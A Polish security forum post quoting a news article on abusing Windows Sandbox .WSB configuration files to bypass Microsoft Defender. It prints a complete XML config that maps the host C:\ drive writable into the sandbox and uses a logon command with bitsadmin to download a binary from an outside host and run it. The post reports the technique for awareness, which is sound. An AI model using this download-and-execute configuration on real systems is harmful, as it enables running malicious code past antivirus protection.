Windows Sandbox (Windows 10 Pro/Enterprise)
#8
Wracam do tematu piaskownicy Windowsowej, ponieważ ciekawa informacja o możliwości jej wykorzystania w celu ataku na system ukazała się na łamach AVLab.

Cytat:Funkcja Windows Sandbox została

[Aby zobaczyć linki, zarejestruj się tutaj]

do Windows 10 Pro i Windows 10 Enterprise jako uzupełnienie zabezpieczeń systemowych przed exploitami. Niestety nie w pełni zostało to przetestowane pod kątem bezpieczeństwa, ponieważ początkowo funkcja piaskownicy miała pomagać w walce przeciwko exploitom na antywirusa Microsoft Defender. Używanie exploitów to niebezpieczny proceder, ponieważ za pomocą luki w antywirusie możliwe jest uruchomienie kodu z uprawnieniami systemowymi. „Sandboksowanie” miało przed tym chronić. I zamiast zabezpieczeń mamy nowy sposób używania systemowych funkcji do oszukiwania antywirusa Microsoft Defender.
(...)
Windows Sandbox może używać plików z rozszerzeniem *.WSB jako dodatkowej konfiguracji dla maszyny wirtualnej. Jest to zwykły plik XML z informacjami technicznymi np. ilościami rdzeni CPU, współdzieleniem schowka, karty sieciowej itp. Więcej danych na ten temat podaje firma Microsoft na 

[Aby zobaczyć linki, zarejestruj się tutaj]

oraz 

[Aby zobaczyć linki, zarejestruj się tutaj]

. Dodajmy, że rozszerzenie WSB jest domyślne skojarzone z programem WindowsSandbox.exe.

Internauta opisał

[Aby zobaczyć linki, zarejestruj się tutaj]

jak obejść zabezpieczenia antywirusa Microsoft Defender za pomocą Windows Sandbox. Stworzył konfigurację XML zawierającą polecenia pobierające szkodliwy plik.

Kod:
<Configuration>
  <MappedFolders>
   <MappedFolder>
     <HostFolder>C:\</HostFolder>
     <SandboxFolder>C:\Users\WDAGUtilityAccount\UserFiles</SandboxFolder>
     <ReadOnly>false</ReadOnly>
   </MappedFolder>
  </MappedFolders>
  <LogonCommand>
    <Command>C:\Users\ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://192.168.0.4/cs_wsb_test.bin "%APPDATA%\cs.exe">nul&start %APPDATA%\cs.exe</Command>
  </LogonCommand>
</Configuration>
Tym oto sposobem zespoły red-team i cyberprzestępcy uzyskali nową sposobność na obchodzenie zabezpieczeń Windows. Brawo!
Całość poniżej

[Aby zobaczyć linki, zarejestruj się tutaj]

"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Odpowiedz


Wiadomości w tym wątku
RE: Windows Sandbox (Windows 10 Pro/Enterprise) - przez Konto usunięte - 19.12.2018, 20:05
RE: Windows Sandbox (Windows 10 Pro/Enterprise) - przez ichito - 10.12.2020, 17:34

Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości